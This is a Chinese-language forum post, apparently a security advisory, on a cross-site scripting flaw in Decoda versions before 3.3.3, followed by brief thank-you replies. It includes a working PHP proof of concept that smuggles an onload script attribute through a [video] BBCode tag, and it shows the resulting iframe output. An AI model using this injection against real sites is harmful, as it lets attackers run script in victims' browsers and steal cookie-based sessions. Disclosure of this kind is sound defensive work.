Decoda跨站脚本漏洞

90_

Decoda 3.3.3之前版本中存在跨站脚本漏洞，该漏洞源于对用户提供的输入未经正确过滤。

攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码，盗取基于cookie的认证证书进而发起其他攻击。

目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本

可用以下的概念证明型攻击：

1. <?php
   
2. include '../decoda/Decoda.php';
   
3. $code = new Decoda();
   
4. $code->addFilter(new VideoFilter()); ?>
   
5. <?php
   
6. 
   
7. $decoda_markup = '[video="youtube" size="small"]"';
   
8. $decoda_markup .= 'onload="alert(\'08sec Pentesting XSS\');" id="[/video]';
   
9. 
   
10. $code->reset($decoda_markup);
    
11. echo $code->parse();
    
12. ?>
    
13. 
    
14. This results in the following output (whitespace adjusted):
    
15. 
    
16. <iframe src="http://www.youtube.com/embed/"; onload="alert('RedTeam
    
17. Pentesting XSS');" id="" width="560" height="315"
    
18. frameborder="0"></iframe>

复制代码

k红颜

Decoda跨站脚本漏洞

sickles

谢谢分享， 学习ing

corpse

k红颜 发表于 2012-5-23 23:57
Decoda跨站脚本漏洞

看看学习下。